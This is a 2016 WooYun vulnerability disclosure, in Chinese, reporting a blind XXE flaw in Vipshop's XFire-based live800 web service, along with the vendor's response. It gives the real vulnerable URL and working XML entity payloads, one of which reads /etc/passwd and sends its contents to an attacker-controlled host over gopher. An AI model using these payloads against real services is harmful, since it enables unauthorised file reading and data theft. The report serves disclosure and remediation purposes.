当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168457

漏洞标题:唯品会存在Blind XXE 漏洞

相关厂商:唯品会

漏洞作者: 路人甲

提交时间:2016-01-08 17:10

修复时间:2016-01-11 10:45

公开时间:2016-01-11 10:45

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-08: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

唯品会存在Blind XXE 漏洞 类似的可以参考 http://wooyun.org/bugs/wooyun-2014-074069

详细说明:

关于XXE,觉得漏洞本身没太多的玩点,比较有意思主要在于:不同语言处理URI的多元化和不同XML解析器在解析XML的一些特性。
具体的漏洞原理可以参考 

http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html


 WooYun: Xfire文件读取漏洞


只能说这是被小瞧的问题,仅作预警和漏洞验证(赶紧内部检查一下所有使用xfire组件的网站吧!!!)

漏洞证明:

xfire是流行的webservice开发组件,其在invoke时使用了STAX解析XML导致XML实体注入发生
问题网站:http://800.vip.com/live800/services/IVerification?wsdl

1.jpg


自己定义XML文件如下:

<!ENTITY % a SYSTEM "file:///"> <!ENTITY % b "<!ENTITY &#37; c SYSTEM 'gopher://ip:port/%a;'>"> %b; %c;


将xml文件保存在vps中 为http://ip:port/1.xml
然后构造如下:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://ip:port/1.xml">%remote;]>


还用wvs的web service 功能 添加如下请求:

2_看图王.jpg


查看返回值:

3_看图王.jpg


4_看图王.jpg


上图可得知通过报错回显的机制(具体原理看上面的文章)可查询到根目录,我们可以修改外部加载的xml文件为任意目录路径 或者是特定的文件,以读取/etc/passwd为例:
xml文件为:

<!ENTITY % a SYSTEM "file:///etc/passwd"> <!ENTITY % b "<!ENTITY &#37; c SYSTEM 'gopher://ip:port/%a;'>"> %b; %c


如图:

5_看图王.jpg


仅作演示,更多请自测,贵司内部应该还有很多存在次缺陷的网站

修复方案:

升级XFire为Apache CXF

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-11 10:45

厂商回复:

感谢您对唯品会安全的支持,此为内部已知的第三方漏洞,唯品会已告知第三方进行修复。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-11 11:00 | Mark0smith ( 实习白帽子 | Rank:99 漏洞数:36 )

    刚公开,新鲜的